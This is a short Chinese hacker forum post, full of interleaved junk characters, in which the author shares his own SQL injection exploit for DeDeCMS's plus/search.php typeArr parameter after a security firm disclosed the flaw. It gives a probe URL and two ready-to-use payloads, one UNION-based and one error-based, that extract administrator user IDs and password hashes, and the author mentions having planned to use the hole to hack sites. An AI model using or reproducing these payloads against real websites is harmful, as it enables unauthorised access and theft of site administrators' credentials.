转载不加作者名的没JJ8 f9 g+ l2 s' p0 N8 x4 b
% y3 w4 q' a( F1 K; I) Q哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
+ R! ?4 g/ `9 W5 S2 f+ T
* f* i7 P- F- ]+ E/ I既然已经发出来了,我就把我自己搞的exp发下吧。。唉。) H% X- S' L' k$ W5 {8 J
6 k v9 I- ?! Z8 k5 O6 @4 r" L
我一般是这样测试的:7 m# S7 p8 V$ E( l
* {2 G. d5 X% ?1 B' e( \
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
& S/ U" d& T& P% j# o+ B) E9 l' ~# n0 L7 H$ m( h! u- c0 l! v+ E" a
转载不加作者名的没JJ! o& C" g- l; |1 i# v3 y
5 P/ i' o" p8 @) t! C
作者:鬼哥 I! f' C* t2 k; L
$ I1 H- p* i# P6 N, O 1 s. l' \; w/ s, C
; n! j( Z9 k, c' S9 D* }1 L看结果如果提示
3 L( J( I9 }, k- V5 _
! D" S2 b; t: H8 fSafe Alert: Request Error step 2 !
& R) m2 S, ?/ L6 @
, U; u- a$ ~$ t2 E那么直接用下面的exp
, h& Z# `2 w( s; ?7 z. o7 ?5 L( G3 H0 J8 I* y9 W$ K
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a- D0 K- {+ R) ~7 v* a m9 c
1 h+ v1 O @7 u% l* b3 O- s7 J" R' o4 z
看结果如果提示$ S/ ~6 s: T0 y
: l& E! ?6 E; ^5 Y
Safe Alert: Request Error step 1 !
5 ~4 S- c7 u4 x8 Q* Y, B
, Q) {, U3 d$ s& C+ B# s那么直接用下面的exp+ Q% q8 t4 T( D7 }& m, l
6 F5 H* X7 ^4 oxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a% M A6 j, x: W* B+ \6 T
: @( U5 |+ B5 w2 f2 \
# E6 v9 z3 _9 q9 f: b& I如果正常显示证明漏洞不存在了。2 ?' G1 w9 [+ T
4 M; @5 A' B+ w% \) u转载不加作者名的没JJ |